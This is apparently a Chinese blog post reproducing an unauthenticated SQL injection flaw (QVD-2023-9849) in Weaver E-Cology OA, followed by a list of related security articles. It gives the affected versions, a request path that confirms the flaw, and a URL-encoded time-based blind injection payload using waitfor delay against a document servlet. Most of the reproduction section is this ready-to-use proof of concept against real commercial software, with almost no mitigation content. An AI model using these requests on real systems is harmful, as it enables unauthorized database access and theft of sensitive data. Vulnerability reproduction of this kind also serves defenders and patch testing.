泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

1.漏洞描述

泛微 Ecology OA 系统对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

影响版本:泛微 Ecology 9.x <= v10.56;泛微 Ecology 8.x <= v10.56

2.漏洞复现

POC

复制代码
/mobile/plugin/CheckServer.jsp?type=mobileSetting

返回状态码200且参数值为{"error";"system error"}证明漏洞存在

进行延时注入:

复制代码
/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%2F**%2Fand(select%2F**%2F1)%3E0%2F**%2Fwaitfor%2F**%2Fdelay'0%3A0%3A10'%2F**%2F

0%3A0%3A10 实际上表示 0:0:10 延时10秒
相关推荐
lifeng43211 小时前
2、 网络安全基础 -- 传输层详解 -- DDos攻击
网络·安全·web安全
apocalypsx9 小时前
CTF自学-SSRF(3)
web安全·网络安全
独行soc9 小时前
2026年渗透测试面试题总结-10(题目+回答)
android·网络·python·安全·web安全·渗透测试·安全狮
运筹vivo@9 小时前
BUUCTF: [极客大挑战 2019]Upload
前端·web安全·php·ctf
运筹vivo@9 小时前
攻防世界: easyupload
前端·web安全·php·ctf
十月南城10 小时前
高可用的三件事——无状态化、水平扩展与故障转移的协同设计
运维·web安全·微服务·云计算·xss
运筹vivo@10 小时前
BUUCTF: [极客大挑战 2019]BabySQL
前端·web安全·php·ctf
米羊12120 小时前
Linux 内核漏洞提权
网络·安全·web安全
运维行者_21 小时前
2026 技术升级,OpManager 新增 AI 网络拓扑与带宽预测功能
运维·网络·数据库·人工智能·安全·web安全·自动化
模型时代1 天前
StealC恶意软件控制面板安全漏洞暴露威胁行为者操作
安全·web安全·php